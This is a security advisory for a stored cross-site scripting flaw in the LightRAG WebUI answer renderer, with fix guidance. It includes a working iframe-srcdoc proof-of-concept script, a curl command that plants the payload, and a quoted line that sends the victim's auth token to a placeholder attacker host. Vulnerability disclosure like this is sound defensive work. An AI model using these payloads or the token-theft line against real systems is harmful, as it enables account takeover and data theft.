VDB
Sign up
MEDIUM6.1

GHSA-xpjq-3w4w-w5wr

lightrag-hku: Stored Cross-Site Scripting (XSS) in the LightRAG WebUI chat/answer renderer via ingested content

Quick fix

GHSA-xpjq-3w4w-w5wr — lightrag-hku: upgrade to the fixed version with the command below.

pip install --upgrade 'lightrag-hku>=1.5.5'

Details

### Summary The LightRAG WebUI renders assistant/answer chat content as **raw HTML** — `react-markdown` is configured with `rehypePlugins={[rehypeRaw]}` and `skipHtml={false}` and **no** HTML sanitizer (`rehype-sanitize`), element allow-list, or custom `urlTransform`. Because answer content is derived from user-ingested documents, an attacker who can add a single document can store an HTML/JavaScript payload that executes in the browser of any user who later retrieves it (typically an administrator), leading to auth-token theft from `localStorage` and full API takeover. No authentication is required in the default configuration.

### Details Sink — `lightrag_webui/src/components/retrieval/ChatMessage.tsx`: - Main answer (`MessageMarkdown`, lines ~348-351) and thinking content (lines ~252-272) render with `rehypePlugins={[rehypeRaw, …]}` and `skipHtml={false}`. The `components` map (lines ~111-156) only restyles safe formatting tags (`p`, `h1`–`h4`, `ul`, `ol`, `li`, `code`); there is no `rehype-sanitize`, no `allowedElements`/`disallowedElements`, and no custom `urlTransform`. - Second sink: mermaid is initialized with `securityLevel: 'loose'` (line ~433) and the rendered SVG is injected via `container.innerHTML = svg` (line ~483) + `bindFunctions(container)`. `'loose'` disables mermaid's output sanitization, so a ` ```mermaid ` block in answer content (HTML label / `click` directive) is an additional script-execution path. - Hardening (not code execution): KaTeX is set with `trust: true` (lines ~261/~359). `\href{javascript:…}` is blocked by React 19, but `\includegraphics{URL}` renders a live remote `<img src>` (arbitrary external resource load from the victim's browser). Recommend `trust: false`.

Source → sink: `POST /documents/text` or `POST /documents/upload` stores the document → `POST /query` returns it (verbatim when `only_need_context=true`, `lightrag/api/routers/query_routes.py:27`; otherwise echoed by the LLM) → the response is streamed into `assistantMessage.content` (`lightrag_webui/src/features/RetrievalView.tsx:340`) → rendered by the sink above.

react-markdown's built-in defenses do NOT cover this: it sanitizes `href`/`src` URLs (so `javascript:` links are blocked) and React ignores string event handlers (so `<img onerror>` is dropped), but raw elements such as `<iframe srcdoc="…">` and `<svg><script>` are rendered unchanged and execute.

### PoC Benign, local-only. Tested at commit `f3378a3` (v1.5.5) with `react@19`, `react-markdown@10.1.0`, `rehype-raw@7.0.0`.

**Fastest check (code review, ~10s):** in `ChatMessage.tsx`, the `<ReactMarkdown>` that renders answers uses `rehypePlugins={[rehypeRaw, …]}` with `skipHtml={false}` and no `rehype-sanitize` / allow-list. Per react-markdown's own documentation, `rehype-raw` on untrusted input without `rehype-sanitize` allows HTML injection — that is the vulnerability.

**Runnable proof (~2 min) — reproduces the exact renderer config and shows it execute in a browser:** ```bash mkdir xss-check && cd xss-check npm init -y npm install react@19 react-dom@19 react-markdown@10 rehype-raw@7 # save the script below as poc.mjs, then: node poc.mjs # open the generated poc.html in any browser (or headless): # msedge --headless=new --dump-dom "file:///ABS/PATH/poc.html" ``` `poc.mjs`: ```js import React from 'react'; import { renderToStaticMarkup } from 'react-dom/server'; import ReactMarkdown from 'react-markdown'; import rehypeRaw from 'rehype-raw'; import { writeFileSync } from 'fs';

// Stands in for an assistant answer built from an ingested document. const answer = `<iframe srcdoc="<script>` + `var h=parent.document.createElement('h1');h.style.color='red';` + `h.textContent='XSS EXECUTED on '+(parent.document.domain||'this page');` + `parent.document.body.appendChild(h);parent.document.title='XSS-EXECUTED';` + `<\/script>"></iframe>`;

// EXACT options from ChatMessage.tsx (rehypeRaw + skipHtml:false, no sanitizer): const body = renderToStaticMarkup( React.createElement(ReactMarkdown, { rehypePlugins: [rehypeRaw], skipHtml: false }, answer) ); writeFileSync('poc.html', `<!doctype html><title>before-xss</title><body>${body}</body>`); console.log(body); // note the LIVE <iframe srcDoc="..."> — not HTML-escaped ```

**Observed** (verified in headless Chromium/Edge): the injected `srcdoc` script runs — the page title becomes `XSS-EXECUTED` and a red "XSS EXECUTED on this page" heading is appended to the document. This confirms attacker HTML in answer content executes. (Separately: `<script>`, `<svg><script>`, and `<iframe srcdoc>` survive rendering; `<img onerror>` and `javascript:` links are neutralized by React / react-markdown, so `<iframe srcdoc>` is the reliable vector.)

**Illustrative end-to-end source path (in a live instance):** ```bash curl -X POST http://127.0.0.1:9621/documents/text \ -H 'Content-Type: application/json' \ -d '{"text":"<iframe srcdoc=\"&lt;script&gt;document.title=document.domain&lt;/script&gt;\"></iframe>","file_source":"note.md"}' ``` Then query the knowledge base from the WebUI (or `POST /query` with `only_need_context=true`); the stored payload renders and the benign marker script runs in the viewer's browser (the page title becomes the origin). A real attacker replaces the benign marker with `fetch('//attacker/?t='+localStorage.getItem('LIGHTRAG-API-TOKEN'))` to exfiltrate the victim's JWT (verified storage key) and impersonate them against the API.

### Impact Stored (persistent) cross-site scripting. Any user in the default no-auth deployment, or any authenticated low-privilege collaborator when auth is enabled, can plant a document whose content runs arbitrary JavaScript in the browser of every user who later retrieves it. Because LightRAG keeps the auth token in `localStorage`, the injected script can read it and drive the API as the victim (exfiltrate/modify/delete the knowledge base and graph, upload documents) — i.e. escalate to full account/instance takeover.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI/lightrag-hku
Introduced in: 0Fixed in: 1.5.5
Fixpip install --upgrade 'lightrag-hku>=1.5.5'

References